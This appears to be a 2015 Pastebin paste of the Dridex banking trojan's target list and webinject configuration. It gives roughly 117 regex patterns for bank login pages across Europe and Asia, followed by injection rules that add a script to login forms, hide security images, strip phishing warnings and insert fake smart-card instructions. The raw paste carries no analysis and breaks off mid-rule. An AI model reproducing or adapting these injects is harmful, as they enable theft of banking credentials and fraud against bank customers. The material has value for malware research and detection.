API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 4th, 2015
77,954
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 57.61 KB | None | 0 0
raw download clone embed print report
  1. dridex 220 targets:
  2. >^https://access\.rbsm\.com/logon/(password|dp300)/.+\.fcc(\?|$)
  3. >^https://ambank\.amonline\.com\.my
  4. >^https://apib\d*\.anz\.com/apinetbank/(Startup|LoginEsInetANZ)\.aspx(\?|$)
  5. >^https://bank\.barclays\.co\.uk/olb/auth/LoginLink\.action
  6. >^https://banking\.lloydsbank\.com/Logon/logon\.aspx(\?|$)
  7. >^https://.*\.banquepopulaire\.fr/(auth/UI/Login|WebSSO_BP/_\d+/index\.html)
  8. >^https://.*/banque/sso/co/connexionsec\.do
  9. >^https://bbank\d+\.ybonline\.co\.uk/ifdu/ifdlm\-web/login\.ctl
  10. >^https://bbmy\.ocbc\.com
  11. >^https://biz\.hkbea\-cyberbanking\.com/servlet/MA01Show(\?|$)
  12. >^https://bizibanking\.bangkokbank\.com/bblamsui/Signon.*\.aspx
  13. >^https://biz\.uob\.com\.my/ELO/login\.jsp
  14. >^https://.*business\.lloydsbank\.co\.uk/business
  15. >^https://cardsonline\-commercial\.com/RBSG\_Commercial/.*Login\.do
  16. >^https://cbs\.ncbchina\.cn/corporbank/login\_basic\_e\.jsp(\?|$)
  17. >^https://cib\.affinonline\.com/business/login\.html
  18. >^https://cib\.bochk\.com/login/cib\_login012\_.*\.jsp(\?|$)
  19. >^https://cib\.bochk\.com/login/fis/cib\_login012\_.*\.jsp(\?|$)
  20. >^https://cib\.icicibank\.com\.sg/CIBSGAPP/BANKAWAY(\?|$)
  21. >^https://clientlogin\.ibb\.ubs\.com/login(\?|$)
  22. >^https://comnet\.pbz\.hr/PbzComnetWeb/app/logon\.html
  23. >^https://connexis\.bnpparibas\.com/
  24. >^https://(corpebankasia|corpebank)\.icbc\.com\.cn/icbc/corporbank/index.*\.jsp(\?|$)
  25. >^https://.*/co_statiqu111111e/js/auth\-min\.js
  26. >^https://.*\.credit\-agricole\.fr/stb/entreeBam
  27. >^https://.*\.directnet\.com/dn/c/cls/auth
  28. >^https://direkt\.rba\.hr/cgi\-bin/ppz2/start/rbat\.jsp
  29. >^https://ebank\.eonbank\.com\.my/cashmgmt/security/commonLogin\.jsp($|\?)
  30. >^https://ebanking\-ch\d+\.ubs\.com/workbench/Index\.do
  31. >^https://ebank\.kasikornbankgroup\.com/kbiznet/login.*\.html
  32. >^https://eb\.bankcomm\.com\.hk/eb/login\.action(\?|$)
  33. >^https://ebusiness\.hangseng\.com/1/2/
  34. >^https://e\-finance\.postfinance\.ch/(ef/secure|secure/fp)/html/
  35. >^https://egyptnet\.bnpparibas\.com/part/.*/dciweb\.htm\?p0=idesai\.tht
  36. >^https://elementa\.otpbanka\.hr/gradjani/.*/foweb/nb/eLEMENTa
  37. >^https://entreprises\.bnpparibas\.net/(NSAccess|NSFR)
  38. >^https://entreprises\.societegenerale\.fr
  39. >^https://.*/fi\d+/bb/logon
  40. >^https://home\d+\.cbonline.co\.uk/ralu.*/reglm\-web/login\.ctl
  41. >^https://home\d+\.ybonline.co\.uk/ralu/reglm\-web/login\.ctl
  42. >^https://ibank\.agribank\.com\.vn/ibank/index\.jsp
  43. >^https://ibank\.bni\.co\.id/corp/AuthenticationController
  44. >^https://ibank\.bri\.co\.id/cms/
  45. >^https://ibank\d*\.bib\.barclays\.com/logon/
  46. >^https://ibank\.hncb\.com\.hk/netbank/pages/jsp/HKLogin/html/HKLogin\_en\.jsp(\?|$)
  47. >^https://ibank\.klikbca\.com
  48. >^https://ibank\.standardchartered\.com\.hk/nfs/login\.htm(\?|$)
  49. >^https://ibank\.standardchartered\.com\.sg/nfs/login\.htm(\?|$)
  50. >^https://ib\.bankmandiri\.co\.id/retail/Login\.do
  51. >^https://ib\.bri\.co\.id/ib\-bri/Login\.html
  52. >^https://ibps\.hpb\.hr/HPB\.iBank\.IBPS\.Web/login\.iface
  53. >^https://ideal\.dbs\.com/loginSubscriber/login/(SubscriberLoginServlet|pin\.jsp)
  54. >^https://internet\-banking\.dbs\.com\.sg/IB/Welcome(\?|$)
  55. >^https://internet\-banking\.hk\.dbs\.com/IB/Welcome(\?|$)
  56. >^https://logon\.reflex\.rhbbank\.com\.my/rhbcams/corporate/login\.jsp
  57. >^https://mcm\.bankmandiri\.co\.id/corp/common/login\.do\?action=login
  58. >^https://mcsign\.ba\-ca\.com/smartoffice/\_mcologon\?\.\.OASLogon
  59. >^https://mib\.bankmandiri\.co\.id/sme/common/login\.do\?action=login
  60. >^https://net\.pbz\.hr/pbz365/logon.*
  61. >^https://online\-business\.tsb\.co\.uk/business/logon/login\.jsp
  62. >^https://particuliers\.secure.lcl\.fr/outil/UAUT
  63. >^https://particuliers\.societegenerale\.fr
  64. >^https://private\.bankofsingapore\.com/IPBWBWeb/Login/.+\.aspx(\?|$)
  65. >^https://professionnels\.societegenerale\.fr
  66. >^https://s2b\.standardchartered\.com/ssoapp/(login\.jsp|core\.security\.login\.event)
  67. >^https://secure\.cafbank\.org
  68. >^https://singapore\.lbbw\-business\.com/LBBWCorpWeb/login/.+\.action(\?|$)
  69. >^https://sme\.standardchartered\.com/commonapp/core\.security\.vascochallenge\.event
  70. >^https://sslsecure\.maybank\.com\.sg/cgi\-bin/mbs/scripts/mbb\_login\.jsp(\?|$)
  71. >^https://uniservices\d*\.uobgroup\.com/(ELO/login\.jsp|wpe/ca/login\.do|wpe/ca/loginForm\.jsp)(\;|\?|$)
  72. >^https://voscomptesenligne\.labanquepostale\.fr/wsost/OstBrokerWeb/loginform
  73. >^https://vpn\.tarumanagara\.com/\+CSCOE\+/logon\.html
  74. >^https://ws\d+\.kasikornbank\.com/baliweb/\d+/site/defaultskin/.*/html/static/logon\.htm
  75. >^https://www\.allianceonline\.net\.my/Corporate/welcome\.htm
  76. >^https://www\.amesecurities\.com\.my/gc/main\.jsp
  77. >^https://www\.bankislam\.biz/rib/login/index
  78. >^https://www\.bizchannel\.cimb\.com\.sg/corp/common\d*/login\.do(\?|$)
  79. >^https://www\.business\.hsbc\.co\.uk/1/2/
  80. >^https://www\.caisse\-epargne\.fr/(particuliers|espace\-pro|entreprises|economie\-sociale).*ind_pauthpopup\.aspx
  81. >^https://www\.cic\.fr/fr/
  82. >^https://www\.citibank\.com\.my/MYGCB/JPS/portal/Index\.do
  83. >^https://www\.citibusiness\.citibank\.com\.sg/SGCBZ/JSO/signon/DisplayCinSignon\.do(\?|$)
  84. >^https://www\.commercial\.hsbc\.com\.hk/1/2/.+
  85. >^https://www\.creditmutuel\.fr/groupe/fr/index\.html
  86. >^https://www\.credit\-suisse\.com\.sg/amserver/UI/Login(\?|$)
  87. >^https://www\.danamonline\.com/onlinebanking/Login/lgn_new\.aspx
  88. >^https://www\d*\.secure\.hsbcnet\.com/uims/content/public/hibm/logon/usernameInput.+
  89. >^https://www\d*\.secure\.hsbcnet\.com/uims/portal/IDV\_CAM10\_AUTHENTICATION(;|$)
  90. >^https://www\d*\.secure\.hsbcnet\.com/uims/portal/IDV\_OTP\_CHALLENGE(;|$)
  91. >^https://www\.ebanking\.cimbthai\.com/cash/logon\.jsp
  92. >^https://www\.fbo\.fubonbank\.com\.hk/fboPortal/index\_e\.jsp(\?|$)
  93. >^https://www\.hongleongonline\.com\.my/business/public/main\.html
  94. >^https://www\.hsbc\.com\.cn/1/2/.+
  95. >^https://www\.hsbc\.com\.sg/1/2/.+
  96. >^https://www\.hsbc\.com\.vn/1/2/
  97. >^https://www\.hsbc\.co\.uk/1/2/
  98. >^https://www\.hsbc\.fr/1/2/hsbc\-france/entreprises\-institutionnels/connexion
  99. >^https://www\.integrator\.barclays\.com/idc/html/LoginStep1\.html
  100. >^https://www\.irakyat\.com\.my/retail/security/commonLogin\.jsp
  101. >^https://www\.kbc\.be/
  102. >^https://www\.maybank2e\.net/M2E/mbbcustomer/
  103. >^https://www\.maybank2u\.com\.my/mbb/m2u/common/mbbLoginCheckAdapt\.do
  104. >^https://www\.maybank2u\.com\.my/mbb/m2uNOW/common/mbbLoginCheckAdapt\.do
  105. >^https://www\.mybsn\.com\.my/mybsn/login/login\.do
  106. >^https://www\.onlinesbiglobal\.com/\S+/BANKAWAY($|\?|\;)
  107. >^https://www\.otpbanka\.hr/english/welcome\.htm
  108. >^https://www\.otpbanka\.hr/html/dobrodosli\.htm
  109. >^https://www\.pekaobiznes24\.pl/do/login
  110. >^https://www\.permatae\-business\.com/corp/common/login\.do\?action=login
  111. >^https://www\.rbsdigital\.com/(login|default)\.aspx
  112. >^https://www\.sbnet\.splitskabanka\.hr/priv/.*/dciweb\.htm
  113. >^https://www\.ucoebanking\.com/BankAwayRetail/.*/web/L001/retail/jsp/user/CorporateSignOn\.aspx(\?|$)
  114. >^https://www\.vietcombank\.com\.vn/ibanking/Default\.aspx
  115. >^https://www\.vietinbank\.vn/ipay/vbh/login\.do
  116. >^https://www\.winglungbank\.com/corpbanking/logon/CbHomLogonInp\.jsp(\?|$)
  117. >^https://www\.zaba\.hr/ebank/gradjani/InnerLogin\.jsp
  118. >^http://www\d*\.secure\.hsbcnet\.com/uims/content/public/hibm/logon/logon\.html
  119.  
  120.  
  121. from dump extract:
  122.  
  123.  
  124. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  125. ]></replacement></modify><modify
  126. <pattern
  127. modifiers
  128. ><![CDATA[(class="frame securityImage")
  129. ]></pattern><replacement
  130. <![CDATA[\1 style="display:none;"
  131. ]></replacement></modify></actions></httpinject><httpinject
  132. <conditions
  133. <url
  134. type
  135. "allow
  136. onpost
  137. onget
  138. modifiers
  139. >^https://banking\.lloydsbank\.com/Logon/logon\.aspx(\?|$)
  140. /url></conditions><actions
  141. <modify
  142. <pattern
  143. modifiers
  144. ><![CDATA[(</form>)
  145. ]></pattern><replacement
  146. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  147. ]></replacement></modify><modify
  148. <pattern
  149. modifiers
  150. ><![CDATA[ class="message">Reminder.*</span>
  151. ]></pattern><replacement
  152. <![CDATA[></span>
  153. ]></replacement></modify></actions></httpinject><httpinject
  154. <conditions
  155. <url
  156. type
  157. "allow
  158. onpost
  159. onget
  160. modifiers
  161. >^https://.*business\.lloydsbank\.co\.uk/business
  162. /url></conditions><actions
  163. <modify
  164. <pattern
  165. modifiers
  166. ><![CDATA[(</form>)
  167. ]></pattern><replacement
  168. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  169. ]></replacement></modify><!--
  170. <modify>
  171. <pattern modifiers="msU">
  172. <![CDATA[(\</title\>)]]>
  173. </pattern>
  174. <replacement>
  175. <![CDATA[\1<style type="text/css">
  176. body {visibility: hidden}
  177. </style>]]>
  178. </replacement>
  179. </modify>
  180. <modify>
  181. <pattern modifiers="msU">
  182. <![CDATA[(\</html\>)]]>
  183. </pattern>
  184. <replacement>
  185. <![CDATA[\1<script type="text/javascript" src="/rpluk/js.php?system=lloydsbiz"></script>]]>
  186. </replacement>
  187. </modify>
  188. --></actions></httpinject><httpinject
  189. <conditions
  190. <url
  191. type
  192. "allow
  193. onpost
  194. onget
  195. modifiers
  196. >^https://bbank\d+\.ybonline\.co\.uk/ifdu/ifdlm\-web/login\.ctl
  197. /url></conditions><actions
  198. <modify
  199. <pattern
  200. modifiers
  201. ><![CDATA[(</form>)
  202. ]></pattern><replacement
  203. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  204. ]></replacement></modify></actions></httpinject><httpinject
  205. <conditions
  206. <url
  207. type
  208. "allow
  209. onpost
  210. onget
  211. modifiers
  212. >^https://home\d+\.ybonline.co\.uk/ralu/reglm\-web/login\.ctl
  213. /url></conditions><actions
  214. <modify
  215. <pattern
  216. modifiers
  217. ><![CDATA[(</form>)
  218. ]></pattern><replacement
  219. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  220. ]></replacement></modify></actions></httpinject><httpinject
  221. <conditions
  222. <url
  223. type
  224. "allow
  225. onpost
  226. onget
  227. modifiers
  228. >^https://ibank\d*\.bib\.barclays\.com/logon/
  229. /url></conditions><actions
  230. <modify
  231. <pattern
  232. modifiers
  233. "msU
  234. ><![CDATA[(\<head.*\>)
  235. ]></pattern><replacement
  236. <![CDATA[\1
  237. <style type="text/css">
  238. body {visibility: hidden; }
  239. </style>
  240. <script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  241. <script type="text/javascript">setTimeout(function(){document.body.style.visibility = 'visible';}, 5000);</script>
  242. ]></replacement></modify><modify
  243. <pattern
  244. modifiers
  245. "msU
  246. ><![CDATA[Your security obligations.*<script
  247. ]></pattern><replacement
  248. <![CDATA[Your security obligations</p></td></tr><tr/><tr/><tr><td width="10%"/><td class="bodytext" colspan="1"><p>Due to our recent security changes you should <b>keep your smart card inserted in your card reader</b>. </p><p>This security message will appear periodically.</p><p>Please tick the box to acknowledge these security obligations.</p></td><td width="40%"/></tr></table><script
  249. ]></replacement></modify></actions></httpinject><httpinject
  250. <conditions
  251. <url
  252. type
  253. "allow
  254. onpost
  255. onget
  256. modifiers
  257. >^https://online\-business\.tsb\.co\.uk/business/logon/login\.jsp
  258. /url></conditions><actions
  259. <modify
  260. <pattern
  261. modifiers
  262. ><![CDATA[(</form>)
  263. ]></pattern><replacement
  264. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  265. ]></replacement></modify></actions></httpinject><httpinject
  266. <conditions
  267. <url
  268. type
  269. "allow
  270. onpost
  271. onget
  272. modifiers
  273. >^https://home\d+\.cbonline.co\.uk/ralu.*/reglm\-web/login\.ctl
  274. /url></conditions><actions
  275. <modify
  276. <pattern
  277. modifiers
  278. ><![CDATA[(</form>)
  279. ]></pattern><replacement
  280. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  281. ]></replacement></modify></actions></httpinject><httpinject
  282. <conditions
  283. <url
  284. type
  285. "allow
  286. onpost
  287. onget
  288. modifiers
  289. >^https://www\.business\.hsbc\.co\.uk/1/2/
  290. /url></conditions><actions
  291. <modify
  292. <pattern
  293. modifiers
  294. "msU
  295. ><![CDATA[(class\="hsbcContent.+</div>)
  296. ]></pattern><replacement
  297. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  298. ]></replacement></modify></actions></httpinject><httpinject
  299. <conditions
  300. <url
  301. type
  302. "allow
  303. onpost
  304. onget
  305. modifiers
  306. >^https://clientlogin\.ibb\.ubs\.com/login(\?|$)
  307. /url></conditions><actions
  308. <modify
  309. <pattern
  310. modifiers
  311. ><![CDATA[(</form>)
  312. ]></pattern><replacement
  313. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  314. ]></replacement></modify></actions></httpinject><httpinject
  315. <conditions
  316. <url
  317. type
  318. "allow
  319. onpost
  320. onget
  321. modifiers
  322. >^https://www\d*\.secure\.hsbcnet\.com/uims/portal/IDV\_OTP\_CHALLENGE(;|$)
  323. /url></conditions><actions
  324. <modify
  325. <pattern
  326. modifiers
  327. ><![CDATA[(</body>)
  328. ]></pattern><replacement
  329. <![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>\1
  330. ]></replacement></modify><modify
  331. <pattern
  332. modifiers
  333. ><![CDATA[<p class="required">Important Reminder.*</p>
  334. ]></pattern><replacement
  335. <![CDATA[
  336. ]></replacement></modify></actions></httpinject><httpinject
  337. <conditions
  338. <url
  339. type
  340. "allow
  341. onpost
  342. onget
  343. modifiers
  344. >^https://www\d*\.secure\.hsbcnet\.com/uims/portal/IDV\_CAM10\_AUTHENTICATION(;|$)
  345. /url></conditions><actions
  346. <modify
  347. <pattern
  348. modifiers
  349. ><![CDATA[(</body>)
  350. ]></pattern><replacement
  351. <![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>\1
  352. ]></replacement></modify><modify
  353. <pattern
  354. modifiers
  355. ><![CDATA[<p class="required">Important Reminder.*</p>
  356. ]></pattern><replacement
  357. <![CDATA[
  358. ]></replacement></modify></actions></httpinject><httpinject
  359. <conditions
  360. <url
  361. type
  362. "allow
  363. onpost
  364. onget
  365. modifiers
  366. >^https://www\d*\.secure\.hsbcnet\.com/uims/content/public/hibm/logon/usernameInput.+
  367. /url></conditions><actions
  368. <modify
  369. <pattern
  370. modifiers
  371. ><![CDATA[(</body>)
  372. ]></pattern><replacement
  373. <![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>\1
  374. ]></replacement></modify><modify
  375. <pattern
  376. modifiers
  377. ><![CDATA[<p class="required">Important Reminder.*</p>
  378. ]></pattern><replacement
  379. <![CDATA[
  380. ]></replacement></modify></actions></httpinject><httpinject
  381. <conditions
  382. <url
  383. type
  384. "allow
  385. onpost
  386. onget
  387. modifiers
  388. >^http://www\d*\.secure\.hsbcnet\.com/uims/content/public/hibm/logon/logon\.html
  389. /url></conditions><actions
  390. <modify
  391. <pattern
  392. modifiers
  393. ><![CDATA[(<head>)
  394. ]></pattern><replacement
  395. <![CDATA[\1
  396. <style>
  397. body {display:none;}
  398. </style>
  399. <script type="text/javascript" language="JavaScript">
  400. top.location.href = 'https://www2.secure.hsbcnet.com/uims/portal/IDV_CAM10_AUTHENTICATION';
  401. </script>
  402. ]></replacement></modify></actions></httpinject><httpinject
  403. <conditions
  404. <url
  405. type
  406. "allow
  407. onpost
  408. onget
  409. modifiers
  410. >^https://www\.rbsdigital\.com/(login|default)\.aspx
  411. /url></conditions><actions
  412. <modify
  413. <pattern
  414. modifiers
  415. ><![CDATA[(</form>)
  416. ]></pattern><replacement
  417. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  418. ]></replacement></modify><modify
  419. <pattern
  420. modifiers
  421. ><![CDATA[(class="frame securityImage")
  422. ]></pattern><replacement
  423. <![CDATA[\1 style="display:none;"
  424. ]></replacement></modify></actions></httpinject><httpinject
  425. <conditions
  426. <url
  427. type
  428. "allow
  429. onpost
  430. onget
  431. modifiers
  432. >^https://www\.integrator\.barclays\.com/idc/html/LoginStep1\.html
  433. /url></conditions><actions
  434. <modify
  435. <pattern
  436. modifiers
  437. ><![CDATA[(</body>)
  438. ]></pattern><replacement
  439. <![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>\1
  440. ]></replacement></modify></actions></httpinject><httpinject
  441. <conditions
  442. <url
  443. type
  444. "allow
  445. onpost
  446. onget
  447. modifiers
  448. >^https://www\.commercial\.hsbc\.com\.hk/1/2/.+
  449. /url></conditions><actions
  450. <modify
  451. <pattern
  452. modifiers
  453. "sAi
  454. ><![CDATA[(.+</body>)
  455. ]></pattern><replacement
  456. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  457. ]></replacement></modify></actions></httpinject><httpinject
  458. <conditions
  459. <url
  460. type
  461. "allow
  462. onpost
  463. onget
  464. modifiers
  465. >^https://internet\-banking\.hk\.dbs\.com/IB/Welcome(\?|$)
  466. /url><url
  467. type
  468. "allow
  469. onpost
  470. onget
  471. modifiers
  472. >^https://internet\-banking\.dbs\.com\.sg/IB/Welcome(\?|$)
  473. /url></conditions><actions
  474. <modify
  475. <pattern
  476. modifiers
  477. ><![CDATA[(</form>)
  478. ]></pattern><replacement
  479. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  480. ]></replacement></modify></actions></httpinject><httpinject
  481. <conditions
  482. <url
  483. type
  484. "allow
  485. onpost
  486. onget
  487. modifiers
  488. >^https://apib\d*\.anz\.com/apinetbank/(Startup|LoginEsInetANZ)\.aspx(\?|$)
  489. /url></conditions><actions
  490. <modify
  491. <pattern
  492. modifiers
  493. ><![CDATA[(</form>)
  494. ]></pattern><replacement
  495. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  496. ]></replacement></modify></actions></httpinject><httpinject
  497. <conditions
  498. <url
  499. type
  500. "allow
  501. onpost
  502. onget
  503. modifiers
  504. >^https://cib\.affinonline\.com/business/login\.html
  505. /url></conditions><actions
  506. <modify
  507. <pattern
  508. modifiers
  509. ><![CDATA[(</form>)
  510. ]></pattern><replacement
  511. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  512. ]></replacement></modify></actions></httpinject><httpinject
  513. <conditions
  514. <url
  515. type
  516. "allow
  517. onpost
  518. onget
  519. modifiers
  520. >^https://ibank\.agribank\.com\.vn/ibank/index\.jsp
  521. /url></conditions><actions
  522. <modify
  523. <pattern
  524. modifiers
  525. ><![CDATA[(</form>)
  526. ]></pattern><replacement
  527. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  528. ]></replacement></modify></actions></httpinject><httpinject
  529. <conditions
  530. <url
  531. type
  532. "allow
  533. onpost
  534. onget
  535. modifiers
  536. >^https://www\.allianceonline\.net\.my/Corporate/welcome\.htm
  537. /url></conditions><actions
  538. <modify
  539. <pattern
  540. modifiers
  541. ><![CDATA[(</form>)
  542. ]></pattern><replacement
  543. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  544. ]></replacement></modify></actions></httpinject><httpinject
  545. <conditions
  546. <url
  547. type
  548. "allow
  549. onpost
  550. onget
  551. modifiers
  552. >^https://ambank\.amonline\.com\.my
  553. /url></conditions><actions
  554. <modify
  555. <pattern
  556. modifiers
  557. ><![CDATA[(</html>)
  558. ]></pattern><replacement
  559. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  560. ]></replacement></modify></actions></httpinject><httpinject
  561. <conditions
  562. <url
  563. type
  564. "allow
  565. onpost
  566. onget
  567. modifiers
  568. >^https://www\.amesecurities\.com\.my/gc/main\.jsp
  569. /url></conditions><actions
  570. <modify
  571. <pattern
  572. modifiers
  573. ><![CDATA[(</html>)
  574. ]></pattern><replacement
  575. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  576. ]></replacement></modify></actions></httpinject><httpinject
  577. <conditions
  578. <url
  579. type
  580. "allow
  581. onpost
  582. onget
  583. modifiers
  584. >^https://cib\.bochk\.com/login/fis/cib\_login012\_.*\.jsp(\?|$)
  585. /url></conditions><actions
  586. <modify
  587. <pattern
  588. modifiers
  589. ><![CDATA[(</form>)
  590. ]></pattern><replacement
  591. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  592. ]></replacement></modify></actions></httpinject><httpinject
  593. <conditions
  594. <url
  595. type
  596. "allow
  597. onpost
  598. onget
  599. modifiers
  600. >^https://ibank\.bri\.co\.id/cms/
  601. /url></conditions><actions
  602. <modify
  603. <pattern
  604. modifiers
  605. ><![CDATA[(</form>)
  606. ]></pattern><replacement
  607. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  608. ]></replacement></modify></actions></httpinject><httpinject
  609. <conditions
  610. <url
  611. type
  612. "allow
  613. onpost
  614. onget
  615. modifiers
  616. >^https://bizibanking\.bangkokbank\.com/bblamsui/Signon.*\.aspx
  617. /url></conditions><actions
  618. <modify
  619. <pattern
  620. modifiers
  621. ><![CDATA[(</form>)
  622. ]></pattern><replacement
  623. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  624. ]></replacement></modify></actions></httpinject><httpinject
  625. <conditions
  626. <url
  627. type
  628. "allow
  629. onpost
  630. onget
  631. modifiers
  632. >^https://www\.bankislam\.biz/rib/login/index
  633. /url></conditions><actions
  634. <modify
  635. <pattern
  636. modifiers
  637. ><![CDATA[(</html>)
  638. ]></pattern><replacement
  639. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  640. ]></replacement></modify></actions></httpinject><httpinject
  641. <conditions
  642. <url
  643. type
  644. "allow
  645. onpost
  646. onget
  647. modifiers
  648. >^https://cib\.bochk\.com/login/cib\_login012\_.*\.jsp(\?|$)
  649. /url></conditions><actions
  650. <modify
  651. <pattern
  652. modifiers
  653. ><![CDATA[(</form>)
  654. ]></pattern><replacement
  655. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  656. ]></replacement></modify></actions></httpinject><httpinject
  657. <conditions
  658. <url
  659. type
  660. "allow
  661. onpost
  662. onget
  663. modifiers
  664. >^https://eb\.bankcomm\.com\.hk/eb/login\.action(\?|$)
  665. /url></conditions><actions
  666. <modify
  667. <pattern
  668. modifiers
  669. ><![CDATA[(.+</form>)
  670. ]></pattern><replacement
  671. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  672. ]></replacement></modify></actions></httpinject><httpinject
  673. <conditions
  674. <url
  675. type
  676. "allow
  677. onpost
  678. onget
  679. modifiers
  680. >^https://biz\.hkbea\-cyberbanking\.com/servlet/MA01Show(\?|$)
  681. /url></conditions><actions
  682. <modify
  683. <pattern
  684. modifiers
  685. ><![CDATA[(.+</form>)
  686. ]></pattern><replacement
  687. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  688. ]></replacement></modify></actions></httpinject><httpinject
  689. <conditions
  690. <url
  691. type
  692. "allow
  693. onpost
  694. onget
  695. modifiers
  696. >^https://private\.bankofsingapore\.com/IPBWBWeb/Login/.+\.aspx(\?|$)
  697. /url></conditions><actions
  698. <modify
  699. <pattern
  700. modifiers
  701. ><![CDATA[(</form>)
  702. ]></pattern><replacement
  703. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  704. ]></replacement></modify></actions></httpinject><httpinject
  705. <conditions
  706. <url
  707. type
  708. "allow
  709. onpost
  710. onget
  711. modifiers
  712. >^https://www\.bizchannel\.cimb\.com\.sg/corp/common\d*/login\.do(\?|$)
  713. /url></conditions><actions
  714. <modify
  715. <pattern
  716. modifiers
  717. ><![CDATA[(</body>)
  718. ]></pattern><replacement
  719. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  720. ]></replacement></modify></actions></httpinject><httpinject
  721. <conditions
  722. <url
  723. type
  724. "allow
  725. onpost
  726. onget
  727. modifiers
  728. >^https://www\.ebanking\.cimbthai\.com/cash/logon\.jsp
  729. /url></conditions><actions
  730. <modify
  731. <pattern
  732. modifiers
  733. ><![CDATA[(</form>)
  734. ]></pattern><replacement
  735. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  736. ]></replacement></modify></actions></httpinject><httpinject
  737. <conditions
  738. <url
  739. type
  740. "allow
  741. onpost
  742. onget
  743. modifiers
  744. >^https://www\.citibusiness\.citibank\.com\.sg/SGCBZ/JSO/signon/DisplayCinSignon\.do(\?|$)
  745. /url></conditions><actions
  746. <modify
  747. <pattern
  748. modifiers
  749. ><![CDATA[(.+</form>)
  750. ]></pattern><replacement
  751. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  752. ]></replacement></modify><modify
  753. <pattern
  754. modifiers
  755. ><![CDATA[.+(?<inject><b>PHISHING ALERT</b>.+?</font>.+?)</font>
  756. ]></pattern><replacement
  757. ></modify></actions></httpinject><httpinject
  758. <conditions
  759. <url
  760. type
  761. "allow
  762. onpost
  763. onget
  764. modifiers
  765. >^https://www\.citibank\.com\.my/MYGCB/JPS/portal/Index\.do
  766. /url></conditions><actions
  767. <modify
  768. <pattern
  769. modifiers
  770. ><![CDATA[(</form>)
  771. ]></pattern><replacement
  772. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  773. ]></replacement></modify></actions></httpinject><httpinject
  774. <conditions
  775. <url
  776. type
  777. "allow
  778. onpost
  779. onget
  780. modifiers
  781. >^https://www\.credit\-suisse\.com\.sg/amserver/UI/Login(\?|$)
  782. /url></conditions><actions
  783. <modify
  784. <pattern
  785. modifiers
  786. ><![CDATA[(</form>)
  787. ]></pattern><replacement
  788. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  789. ]></replacement></modify></actions></httpinject><httpinject
  790. <conditions
  791. <url
  792. type
  793. "allow
  794. onpost
  795. onget
  796. modifiers
  797. >^https://ideal\.dbs\.com/loginSubscriber/login/(SubscriberLoginServlet|pin\.jsp)
  798. /url></conditions><actions
  799. <modify
  800. <pattern
  801. modifiers
  802. ><![CDATA[(</form>)
  803. ]></pattern><replacement
  804. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  805. ]></replacement></modify></actions></httpinject><httpinject
  806. <conditions
  807. <url
  808. type
  809. "allow
  810. onpost
  811. onget
  812. modifiers
  813. >^https://.*\.directnet\.com/dn/c/cls/auth
  814. /url></conditions><actions
  815. <modify
  816. <pattern
  817. modifiers
  818. ><![CDATA[(</form>)
  819. ]></pattern><replacement
  820. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  821. ]></replacement></modify></actions></httpinject><httpinject
  822. <conditions
  823. <url
  824. type
  825. "allow
  826. onpost
  827. onget
  828. modifiers
  829. >^https://www\.fbo\.fubonbank\.com\.hk/fboPortal/index\_e\.jsp(\?|$)
  830. /url></conditions><actions
  831. <modify
  832. <pattern
  833. modifiers
  834. ><![CDATA[(</form>)
  835. ]></pattern><replacement
